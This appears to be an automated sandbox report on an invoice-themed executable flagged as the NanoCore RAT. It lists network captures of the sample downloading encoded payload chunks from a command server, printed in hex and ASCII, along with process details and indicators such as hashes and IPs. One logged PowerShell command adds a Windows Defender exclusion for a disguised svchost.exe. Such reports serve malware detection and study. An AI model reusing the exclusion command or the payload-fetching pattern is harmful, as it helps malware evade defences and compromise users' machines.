63 78 63 51 78 4c 63 78 63 51 6d 6d 63 78 63 6c 42 63 78 63 6c 77 63 78 63 51 78 4c 63 78 63 51 78 42 63 78 63 51 78 6c 63 78 63 51 78 6d 63 78 63 51 78 6a 63 78 63 51 51 6c 63 78 63 67 51 63 78 63 67 51 63 78 63 51 51 67 63 78 63 6c 6a 63 78 63 77 67 63 78 63 6c 6d 63 78 63 51 6d 6d 63 78 63 51 78 6a 63 78 63 4e 42 63 78 63 77 4e 63 78 63 67 77 63 78 63 51 78 4e 63 78 63 51 6d 51 63 78 63 51 78 4e 63 78 63 51 51 6a 63 78 63 4c 77 63 78 63 51 78 6c 63 78 63 4e 4c 63 78 63 77 6d 63 78 63 67 51 63 78 63 77 51 63 78 63 4e 77 63 78 63 6c 77 63 78 63 4e 6c 63 78 63 77 6c 63 78 63 51 78 78 63 78 63 4c 78 63 78 63 6c 4e 63 78 63 4e 4c 63 78 63 6c 51 63 78 63 51 78 42 63 78 63 6c 77 63 78 63 67 4e 63 78 63 51 51 4e 63 78 63 67 6a 63 78 63 77 6c 63 78 63 6a 6c 63 78 63 6c 4e 63 78 63 4e 77 63 78 63 77 6a 63 78 63 77 67 63 78 63 51 6d 6d 63 78 63 77 6d 63 78 63 67 67 63 78 63 4c 77 63 78 63 4c 78 63 78 63 51 78 6c 63 78 63 51 78 67 63 78 63 4c 6c 63 78 63 4e 6c 63 78 63 6c 78 63 78 63 77 6d 63 78 63 51 78 4c 63 78 63 77 6a 63 78 63 6c 6c 63 78 63 77 51 63 78 63 6c 4e 63 78 63 77 77 63 78 63 51 6d 6d 63 78 63 51 78 51 63 78 63 67 6d 63 78 63 51 51 78 63 78 63 51 78 4c 63 78 63 51 51 77 63 78 63 6c 77 63 78 63 51 78 42 63 78 63 51 51 4c 63 78 63 6a 67 63 Data Ascii: 52b2<p>cxclBcxcLxcxcwxcxcQQNcxclLcxcwgcxcQxgcxcwjcxcjwcxclBcxcgBcxcgQcxcQmxcxcwLcxcljcxcgBcxcwwcxcgQcxcQxwcxcQxBcxcgwcxcQxLcxcQmmcxclBcxclwcxcQxLcxcQxBcxcQxlcxcQxmcxcQxjcxcQQlcxcgQcxcgQcxcQQgcxcljcxcwgcxclmcxcQmmcxcQxjcxcNBcxcwNcxcgwcxcQxNcxcQmQcxcQxNcxcQQjcxcLwcxcQxlcxcNLcxcwmcxcgQcxcwQcxcNwcxclwcxcNlcxcwlcxcQxxcxcLxcxclNcxcNLcxclQcxcQxBcxclwcxcgNcxcQQNcxcgjcxcwlcxcjlcxclNcxcNwcxcwjcxcwgcxcQmmcxcwmcxcggcxcLwcxcLxcxcQxlcxcQxgcxcLlcxcNlcxclxcxcwmcxcQxLcxcwjcxcllcxcwQcxclNcxcwwcxcQmmcxcQxQcxcgmcxcQQxcxcQxLcxcQQwcxclwcxcQxBcxcQQLcxcjgc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49767	104.21.71.230	80	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 09:14:42.288417101 CET	6603	OUT	GET /base/EE6EDC43DDDD18D0313D668388B5ECD3.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Feb 22, 2021 09:14:42.494074106 CET	6605	IN	HTTP/1.1 200 OK Date: Mon, 22 Feb 2021 08:14:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d3ee4a13bf46633acdca9743e1a51af9e1613981682; expires=Wed, 24-Mar-21 08:14:42 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Mon, 22 Feb 2021 03:56:11 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 086a67229700000c0134381000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YC471kQ9Yz9r4pFkf%2FRLU112GnpRem11VCl7peYy7tqKqgunfWBmQLf9leiMoLysaLV%2FalJ5YNRna6USW4W0scHsmUEO8zfS%2B%2FkDZq%2FP2QvCLI6R"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 6257414a8da90c01-AMS Data Raw: 36 63 35 38 0d 0a 3c 70 3e 77 77 63 4c 78 63 51 4e 4e 63 78 63 42 63 78 63 78 63 78 63 4e 63 78 63 78 63 78 63 6d 67 67 63 6d 67 67 63 78 63 78 63 51 6c 4e 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 6a 4e 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 51 6d 6c 63 78 63 78 63 78 63 51 4e 63 42 51 63 51 6c 6a 63 51 4e 63 78 63 51 6c 78 63 4c 63 6d 78 67 63 42 42 63 51 6c 4e 63 51 63 77 6a 63 6d 78 67 63 42 42 63 6c 4e 63 51 78 4e 63 51 78 67 63 51 51 67 63 42 6d 63 51 51 6d 63 51 51 4e 63 51 51 51 63 51 78 42 63 51 51 4e 63 4c 77 63 51 78 4c 63 42 6d 63 4c 4c 63 4c 77 63 51 51 78 63 51 51 78 63 51 51 51 63 51 51 6a 63 42 6d 63 4c 6c 63 51 78 51 63 42 6d 63 51 51 4e 63 51 51 77 63 51 51 78 63 42 6d 63 51 78 67 63 51 51 78 63 42 6d 63 6a 6c 63 77 4c 63 6c 42 63 42 6d 63 51 78 4c 63 51 51 51 63 51 78 78 63 51 78 51 63 4e 6a 63 51 42 63 51 42 63 51 78 63 42 6a 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 6c 78 63 6a 4c 63 78 63 78 63 77 6a 63 51 63 42 63 78 63 77 6a 63 51 4e 6d 63 4e 51 63 51 6c 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 6d 6d 4e 63 78 63 42 4e 63 78 63 51 51 63 51 63 6c 78 63 78 63 78 63 78 63 51 51 63 78 63 78 63 6a 63 78 63 78 63 78 63 78 63 78 63 78 63 6d 42 6c 63 42 51 63 51 51 63 78 63 78 63 42 6d 63 78 63 78 63 78 63 42 6d 63 51 51 63 78 63 78 63 78 63 78 63 51 6d 6c 63 78 63 42 6d 63 78 63 78 63 78 63 6d 63 78 63 78 63 4e 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 4e 63 78 63 78 63 78 Data Ascii: 6c58<p>wwcLxcQNNcxcBcxcxcxcNcxcxcxcmggcmggcxcxcQlNcxcxcxcxcxcxcxcjNcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcQmlcxcxcxcQNcBQcQljcQNcxcQlxcLcmxgcBBcQlNcQcwjcmxgcBBclNcQxNcQxgcQQgcBmcQQmcQQNcQQQcQxBcQQNcLwcQxLcBmcLLcLwcQQxcQQxcQQQcQQjcBmcLlcQxQcBmcQQNcQQwcQQxcBmcQxgcQQxcBmcjlcwLclBcBmcQxLcQQQcQxxcQxQcNjcQBcQBcQxcBjcxcxcxcxcxcxcxclxcjLcxcxcwjcQcBcxcwjcQNmcNQcQlxcxcxcxcxcxcxcxcxcmmNcxcBNcxcQQcQclxcxcxcxcQQcxcxcjcxcxcxcxcxcxcmBlcBQcQQcxcxcBmcxcxcxcBmcQQcxcxcxcxcQmlcxcBmcxcxcxcmcxcxcNcxcxcxcxcxcxcxcNcxcxcx
Feb 22, 2021 09:14:42.494100094 CET	6606	IN	Data Raw: 63 78 63 78 63 78 63 78 63 78 63 4c 6a 63 51 51 63 78 63 78 63 6d 63 78 63 78 63 78 63 78 63 78 63 78 63 6d 63 78 63 6a 4e 63 51 42 42 63 78 63 78 63 51 6a 63 78 63 78 63 51 6a 63 78 63 78 63 78 63 78 63 51 6a 63 78 63 78 63 51 6a 63 78 63 78 63 Data Ascii: cxcxcxcxcxcLjcQQcxcxcmcxcxcxcxcxcxcmcxcjNcQBBcxcxcQjcxcxcQjcxcxcxcxcQjcxcxcQjcxcxcxcxcxcxcQjcxcxcxcxcxcxcxcxcxcxcxcQNlcBQcQQcxclwcxcxcxcxcBmcQQcxcQBjcBcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcjNcQQcxcQmcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxc
Feb 22, 2021 09:14:42.494116068 CET	6608	IN	Data Raw: 42 78 63 6d 63 4e 78 63 51 42 6a 63 78 63 78 63 51 78 63 4e 6d 63 42 6c 63 78 63 6d 63 4e 78 63 51 42 77 63 78 63 78 63 51 78 63 78 63 4e 6d 63 51 6a 6a 63 51 51 67 63 51 42 6c 63 78 63 78 63 51 78 63 51 6d 6c 63 4e 63 78 63 78 63 4e 63 51 51 67 Data Ascii: BxcmcNxcQBjcxcxcQxcNmcBlcxcmcNxcQBwcxcxcQxcxcNmcQjjcQQgcQBlcxcxcQxcQmlcNcxcxcNcQQgcQBLcxcxcQxcQmlcgcxcxcNcQQgcQNxcxcxcQxcQmlcjcxcxcNcQQgcQNQcxcxcQxcQmlcwcxcxcNcNmcBlcxcBcmgNcmQcLcxcxcmwcNmcBlcxcmcNxcQQwcxcxcQxcxcNmclmcxcmcNxcQQwcxcxcQxcxcmcQQg
Feb 22, 2021 09:14:42.494128942 CET	6609	IN	Data Raw: 6d 63 42 63 78 63 78 63 78 63 42 51 63 51 78 51 63 51 67 77 63 42 77 63 6d 67 63 42 51 63 51 6d 42 63 51 67 77 63 42 77 63 42 6d 63 6d 63 78 63 78 63 78 63 42 51 63 4c 4c 63 51 67 77 63 42 77 63 42 6d 63 6d 63 78 63 78 63 78 63 42 51 63 67 4e 63 Data Ascii: mcBcxcxcxcBQcQxQcQgwcBwcmgcBQcQmBcQgwcBwcBmcmcxcxcxcBQcLLcQgwcBwcBmcmcxcxcxcBQcgNcQgwcBwcBmcmcxcxcxcBQcLlcQgwcBwcBmcmcxcxcxcBQcLLcQgwcBwcmNcBQcQmgcQgwcBwcBmcQcxcxcxcBQcgwcQgwcBwcBmcQcxcxcxcBQcgmcQgwcBwcBmcQcxcxcxcBQcLlcQgwcBwcBmcQcxcxcxcBQcgQc
Feb 22, 2021 09:14:42.494147062 CET	6610	IN	Data Raw: 77 63 42 77 63 42 6d 63 51 6d 63 78 63 78 63 78 63 42 51 63 67 6d 63 51 67 77 63 42 77 63 42 51 63 51 6d 63 42 51 63 6c 6d 63 51 67 77 63 42 77 63 42 6d 63 51 51 63 78 63 78 63 78 63 42 51 63 4e 6c 63 51 67 77 63 42 77 63 42 6d 63 51 51 63 78 63 Data Ascii: wcBwcBmcQmcxcxcxcBQcgmcQgwcBwcBQcQmcBQclmcQgwcBwcBmcQQcxcxcxcBQcNlcQgwcBwcBmcQQcxcxcxcBQcQxQcQgwcBwcBmcQQcxcxcxcBQcgQcQgwcBwcBmcQQcxcxcxcBQcQxmcQgwcBwcBQcQQcBQcQxxcQgwcBwcBmcQxcxcxcxcBQcgQcQgwcBwcBmcQxcxcxcxcBQcQxmcQgwcBwcBmcQxcxcxcxcBQcLLcQgw
Feb 22, 2021 09:14:42.494168997 CET	6612	IN	Data Raw: 63 78 63 78 63 78 63 78 63 42 51 63 67 6d 63 51 67 77 63 42 77 63 42 6d 63 78 63 78 63 78 63 78 63 42 51 63 67 78 63 51 67 77 63 42 77 63 42 6d 63 78 63 78 63 78 63 78 63 42 51 63 4c 4c 63 51 67 77 63 42 77 63 6d 6d 63 42 51 63 51 6d 42 63 51 67 Data Ascii: cxcxcxcxcBQcgmcQgwcBwcBmcxcxcxcxcBQcgxcQgwcBwcBmcxcxcxcxcBQcLLcQgwcBwcmmcBQcQmBcQgwcQQgcmmcxcxcQxcxcmgNcQmcQcxcNxcmlcxcxcQxcNxcmcxcxcjcNxcmLcxcxcQxcxcxcQQgcBxcxcxcQxcmgNcQNcBcxcmgNcQmcBcxcQQQcBQcxcxcQxcBQcQLcQNQcjLcxcxcQcBwcBmcQlcxcxcxcBQcQxQc
Feb 22, 2021 09:14:42.494187117 CET	6613	IN	Data Raw: 63 78 63 78 63 78 63 42 51 63 51 78 78 63 51 67 77 63 42 77 63 42 6d 63 4c 63 78 63 78 63 78 63 42 51 63 67 6a 63 51 67 77 63 42 77 63 42 6d 63 4c 63 78 63 78 63 78 63 42 51 63 67 42 63 51 67 77 63 42 77 63 42 51 63 4c 63 42 51 63 4c 4c 63 51 67 Data Ascii: cxcxcxcBQcQxxcQgwcBwcBmcLcxcxcxcBQcgjcQgwcBwcBmcLcxcxcxcBQcgBcQgwcBwcBQcLcBQcLLcQgwcBwcBmclcxcxcxcBQcgBcQgwcBwcBmclcxcxcxcBQcgmcQgwcBwcBmclcxcxcxcBQcNLcQgwcBwcBmclcxcxcxcBQcgBcQgwcBwcBxcBQcQQxcQgwcBwcBmcwcxcxcxcBQcgmcQgwcBwcBmcwcxcxcxcBQcQxmcQ
Feb 22, 2021 09:14:42.494204044 CET	6614	IN	Data Raw: 78 6c 63 78 63 78 63 78 63 42 51 63 4c 6c 63 51 67 77 63 42 77 63 42 6d 63 51 78 6c 63 78 63 78 63 78 63 42 51 63 4e 4c 63 51 67 77 63 42 77 63 42 6d 63 51 78 6c 63 78 63 78 63 78 63 42 51 63 51 78 6d 63 51 67 77 63 42 77 63 42 6d 63 51 78 6c 63 Data Ascii: xlcxcxcxcBQcLlcQgwcBwcBmcQxlcxcxcxcBQcNLcQgwcBwcBmcQxlcxcxcxcBQcQxmcQgwcBwcBmcQxlcxcxcxcBQcQxQcQgwcBwcBQcQxlcBQcQQwcQgwcBwcBmcQxwcxcxcxcBQcgBcQgwcBwcBmcQxwcxcxcxcBQcQxmcQgwcBwcBmcQxwcxcxcxcBQcLwcQgwcBwcBmcQxwcxcxcxcBQcgQcQgwcBwcBQcQxwcBQclmcQg
Feb 22, 2021 09:14:42.494223118 CET	6616	IN	Data Raw: 67 77 63 42 77 63 42 51 63 4c 6c 63 42 51 63 6c 6d 63 51 67 77 63 42 77 63 42 6d 63 4c 77 63 78 63 78 63 78 63 42 51 63 67 51 63 51 67 77 63 42 77 63 42 6d 63 4c 77 63 78 63 78 63 78 63 42 51 63 4c 6c 63 51 67 77 63 42 77 63 42 6d 63 4c 77 63 78 Data Ascii: gwcBwcBQcLlcBQclmcQgwcBwcBmcLwcxcxcxcBQcgQcQgwcBwcBmcLwcxcxcxcBQcLlcQgwcBwcBmcLwcxcxcxcBQcLlcQgwcBwcBmcLwcxcxcxcBQcLlcQgwcBwcBQcLwcBQcNwcQgwcBwcBmcLjcxcxcxcBQcgwcQgwcBwcBmcLjcxcxcxcBQcgmcQgwcBwcBmcLjcxcxcxcBQcLwcQgwcBwcBmcLjcxcxcxcBQcgwcQgwcBw
Feb 22, 2021 09:14:42.494245052 CET	6617	IN	Data Raw: 77 63 42 77 63 42 6d 63 6c 6a 63 78 63 78 63 78 63 42 51 63 4c 6c 63 51 67 77 63 42 77 63 42 6d 63 6c 6a 63 78 63 78 63 78 63 42 51 63 67 42 63 51 67 77 63 42 77 63 42 6d 63 6c 6a 63 78 63 78 63 78 63 42 51 63 67 67 63 51 67 77 63 42 77 63 42 6d Data Ascii: wcBwcBmcljcxcxcxcBQcLlcQgwcBwcBmcljcxcxcxcBQcgBcQgwcBwcBmcljcxcxcxcBQcggcQgwcBwcBmcljcxcxcxcBQcQxmcQgwcBwcBQcljcBQcQQNcQgwcBwcBmclgcxcxcxcBQcLlcQgwcBwcBmclgcxcxcxcBQcNLcQgwcBwcBmclgcxcxcxcBQcgQcQgwcBwcBmclgcxcxcxcBQcLLcQgwcBwcBQclgcBQcQxgcQgwc
Feb 22, 2021 09:14:42.495254040 CET	6619	IN	Data Raw: 63 42 51 63 4c 4c 63 51 67 77 63 42 77 63 42 6d 63 77 67 63 78 63 78 63 78 63 42 51 63 4e 4c 63 51 67 77 63 42 77 63 42 6d 63 77 67 63 78 63 78 63 78 63 42 51 63 67 51 63 51 67 77 63 42 77 63 42 6d 63 77 67 63 78 63 78 63 78 63 42 51 63 4c 6c 63 Data Ascii: cBQcLLcQgwcBwcBmcwgcxcxcxcBQcNLcQgwcBwcBmcwgcxcxcxcBQcgQcQgwcBwcBmcwgcxcxcxcBQcLlcQgwcBwcBQcwgcBQcBNcQgwcBwcBmcwNcxcxcxcBQcNlcQgwcBwcBmcwNcxcxcxcBQcgQcQgwcBwcBmcwNcxcxcxcBQcLLcQgwcBwcBmcwNcxcxcxcBQcgjcQgwcBwcBQcwNcBQcBmcQgwcBwcBmcwBcxcxcxcBQcN
Feb 22, 2021 09:14:54.994440079 CET	12328	OUT	GET /base/563CB4793425B369FD0FAF05E615CF43.html HTTP/1.1 Host: coroloboxorozor.com
Feb 22, 2021 09:14:55.129362106 CET	12329	IN	HTTP/1.1 200 OK Date: Mon, 22 Feb 2021 08:14:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d87de4d02b35a0fd24e7608b29febf03d1613981695; expires=Wed, 24-Mar-21 08:14:55 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax last-modified: Mon, 22 Feb 2021 03:56:14 GMT vary: Accept-Encoding x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 086a67543a00000c012a041000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5LHt%2BzSN7mUvEuuDj24GGbmB3UvG1KT9HhPY4ogGJnJe84EMb1rjL7ymOoVPocmYIz3BfxM7W6tJGgOTB57exaOn%2FO9X%2FqsslwjTDALoQVNfyZwP"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62574199fba30c01-AMS Data Raw: 33 32 32 36 0d 0a 3c 70 3e 6c 4e 63 6a 77 63 6d 42 63 51 4c 67 63 6d 42 6d 63 51 67 4e 63 51 6c 63 6d 51 78 63 51 4c 6c 63 4e 6d 63 4c 78 63 51 4c 77 63 77 42 63 51 67 4e 63 6d 6c 63 51 78 4c 63 6d 51 6a 63 77 78 63 6d 6d 67 63 6d 4c 63 51 51 78 63 51 6d 4e 63 67 42 63 6d 42 6a 63 51 6d 78 63 51 77 42 63 51 4e 67 63 6d 42 42 63 6c 78 63 4e 6a 63 51 6c 42 63 67 6d 63 51 78 4c 63 51 77 78 63 51 78 4e 63 6d 67 6d 63 51 4e 51 63 6c 6d 63 51 6c 77 63 6d 78 77 63 51 51 4e 63 6d 67 4e 63 51 6d 4e 63 42 6a 63 67 63 51 4e 42 63 6d 78 51 63 6a 6c 63 51 6a 51 63 6d 4e 6d 63 51 78 42 63 6d 51 6a 63 51 77 63 6d 6d 67 63 6d 51 77 63 51 51 42 63 77 42 63 51 42 6c 63 6d 78 77 63 67 6a 63 6d 42 6d 63 6d 4e 51 63 77 6d 63 51 6a 6d 63 51 42 4e 63 51 6c 77 63 51 6d 6c 63 51 4c 67 63 42 63 51 42 77 63 67 6d 63 51 4c 6d 63 51 51 77 63 51 51 6d 63 51 77 4c 63 4c 63 4c 42 63 42 6d 63 6d 51 42 63 6d 6a 63 51 77 77 63 51 77 78 63 6a 6c 63 51 77 77 63 51 78 4e 63 51 6d 77 63 6d 6d 6a 63 67 63 51 78 4c 63 67 6a 63 51 6d 42 63 51 4e 63 6d 78 6a 63 6c 78 63 6d 42 42 63 51 67 4c 63 4e 4e 63 51 6d 6c 63 6d 42 63 6d 42 6d 63 51 6a 4c 63 51 67 78 63 77 77 63 6c 4c 63 4c 6d 63 6d 78 78 63 6d 42 42 63 4c 4e 63 4e 4c 63 51 4c 4c 63 6d 78 78 63 67 78 63 67 51 63 6d 42 67 63 51 42 6a 63 42 4c 63 51 51 51 63 51 6c 6a 63 51 77 63 51 6c 42 63 51 4e 6a 63 6d 4e 63 6d 78 4c 63 51 6c 4c 63 51 4e 78 63 6d 67 63 4e 42 63 51 67 6d 63 6d 51 4c 63 6d 51 77 63 6d 4c 63 6d 42 42 63 6d 67 63 6d 4e 63 6d 4e 42 63 6d 67 6d 63 51 6a 6c 63 6c 63 6d 6c 63 6d 6a 63 51 6a 4c 63 6a 6d 63 51 6a 67 63 51 6d 63 6c 4e 63 51 6c 6d 63 6d 51 6d 63 6a 78 63 51 Data Ascii: 3226<p>lNcjwcmBcQLgcmBmcQgNcQlcmQxcQLlcNmcLxcQLwcwBcQgNcmlcQxLcmQjcwxcmmgcmLcQQxcQmNcgBcmBjcQmxcQwBcQNgcmBBclxcNjcQlBcgmcQxLcQwxcQxNcmgmcQNQclmcQlwcmxwcQQNcmgNcQmNcBjcgcQNBcmxQcjlcQjQcmNmcQxBcmQjcQwcmmgcmQwcQQBcwBcQBlcmxwcgjcmBmcmNQcwmcQjmcQBNcQlwcQmlcQLgcBcQBwcgmcQLmcQQwcQQmcQwLcLcLBcBmcmQBcmjcQwwcQwxcjlcQwwcQxNcQmwcmmjcgcQxLcgjcQmBcQNcmxjclxcmBBcQgLcNNcQmlcmBcmBmcQjLcQgxcwwclLcLmcmxxcmBBcLNcNLcQLLcmxxcgxcgQcmBgcQBjcBLcQQQcQljcQwcQlBcQNjcmNcmxLcQlLcQNxcmgcNBcQgmcmQLcmQwcmLcmBBcmgcmNcmNBcmgmcQjlclcmlcmjcQjLcjmcQjgcQmclNcQlmcmQmcjxcQ
Feb 22, 2021 09:15:09.839158058 CET	13518	OUT	GET /base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html HTTP/1.1 Host: coroloboxorozor.com
Feb 22, 2021 09:15:09.987102985 CET	13519	IN	HTTP/1.1 200 OK Date: Mon, 22 Feb 2021 08:15:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d96d6099f8c046104351d020795d60d371613981709; expires=Wed, 24-Mar-21 08:15:09 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Mon, 22 Feb 2021 03:56:16 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 086a678e3600000c0179ae8000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8EBM95%2FoUL3B4iDiNkp%2BFzrstA1Vccj%2F%2BQh2fytdlAehbIGpnxp%2BURWoL47DyBKwG4f9VGrjiL%2BhhXDA%2BPSb%2BIm%2FzyInHHxMlB4thxLlJozmaaBB"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 625741f6bf180c01-AMS Data Raw: 35 32 62 32 0d 0a 3c 70 3e 63 78 63 6c 42 63 78 63 4c 78 63 78 63 77 78 63 78 63 51 51 4e 63 78 63 6c 4c 63 78 63 77 67 63 78 63 51 78 67 63 78 63 77 6a 63 78 63 6a 77 63 78 63 6c 42 63 78 63 67 42 63 78 63 67 51 63 78 63 51 6d 78 63 78 63 77 4c 63 78 63 6c 6a 63 78 63 67 42 63 78 63 77 77 63 78 63 67 51 63 78 63 51 78 77 63 78 63 51 78 42 63 78 63 67 77 63 78 63 51 78 4c 63 78 63 51 6d 6d 63 78 63 6c 42 63 78 63 6c 77 63 78 63 51 78 4c 63 78 63 51 78 42 63 78 63 51 78 6c 63 78 63 51 78 6d 63 78 63 51 78 6a 63 78 63 51 51 6c 63 78 63 67 51 63 78 63 67 51 63 78 63 51 51 67 63 78 63 6c 6a 63 78 63 77 67 63 78 63 6c 6d 63 78 63 51 6d 6d 63 78 63 51 78 6a 63 78 63 4e 42 63 78 63 77 4e 63 78 63 67 77 63 78 63 51 78 4e 63 78 63 51 6d 51 63 78 63 51 78 4e 63 78 63 51 51 6a 63 78 63 4c 77 63 78 63 51 78 6c 63 78 63 4e 4c 63 78 63 77 6d 63 78 63 67 51 63 78 63 77 51 63 78 63 4e 77 63 78 63 6c 77 63 78 63 4e 6c 63 78 63 77 6c 63 78 63 51 78 78 63 78 63 4c 78 63 78 63 6c 4e 63 78 63 4e 4c 63 78 63 6c 51 63 78 63 51 78 42 63 78 63 6c 77 63 78 63 67 4e 63 78 63 51 51 4e 63 78 63 67 6a 63 78 63 77 6c 63 78 63 6a 6c 63 78 63 6c 4e 63 78 63 4e 77 63 78 63 77 6a 63 78 63 77 67 63 78 63 51 6d 6d 63 78 63 77 6d 63 78 63 67 67 63 78 63 4c 77 63 78 63 4c 78 63 78 63 51 78 6c 63 78 63 51 78 67 63 78 63 4c 6c 63 78 63 4e 6c 63 78 63 6c 78 63 78 63 77 6d 63 78 63 51 78 4c 63 78 63 77 6a 63 78 63 6c 6c 63 78 63 77 51 63 78 63 6c 4e 63 78 63 77 77 63 78 63 51 6d 6d 63 78 63 51 78 51 63 78 63 67 6d 63 78 63 51 51 78 63 78 63 51 78 4c 63 78 63 51 51 77 63 78 63 6c 77 63 78 63 51 78 42 Data Ascii: 52b2<p>cxclBcxcLxcxcwxcxcQQNcxclLcxcwgcxcQxgcxcwjcxcjwcxclBcxcgBcxcgQcxcQmxcxcwLcxcljcxcgBcxcwwcxcgQcxcQxwcxcQxBcxcgwcxcQxLcxcQmmcxclBcxclwcxcQxLcxcQxBcxcQxlcxcQxmcxcQxjcxcQQlcxcgQcxcgQcxcQQgcxcljcxcwgcxclmcxcQmmcxcQxjcxcNBcxcwNcxcgwcxcQxNcxcQmQcxcQxNcxcQQjcxcLwcxcQxlcxcNLcxcwmcxcgQcxcwQcxcNwcxclwcxcNlcxcwlcxcQxxcxcLxcxclNcxcNLcxclQcxcQxBcxclwcxcgNcxcQQNcxcgjcxcwlcxcjlcxclNcxcNwcxcwjcxcwgcxcQmmcxcwmcxcggcxcLwcxcLxcxcQxlcxcQxgcxcLlcxcNlcxclxcxcwmcxcQxLcxcwjcxcllcxcwQcxclNcxcwwcxcQmmcxcQxQcxcgmcxcQQxcxcQxLcxcQQwcxclwcxcQxB

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164 Parent PID: 5908

General

Start time:	09:13:23
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe'
Imagebase:	0x700000
File size:	209408 bytes
MD5 hash:	379482795DA0042D0070E6AE599A369B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 6988 Parent PID: 568

General

Start time:	09:13:33
Start date:	22/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6292 Parent PID: 568

General

Start time:	09:13:52
Start date:	22/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6952 Parent PID: 568

General

Start time:	09:14:03
Start date:	22/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 7088 Parent PID: 7164

General

Start time:	09:14:13
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force
Imagebase:	0xca0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5844 Parent PID: 7088

General

Start time:	09:14:13
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
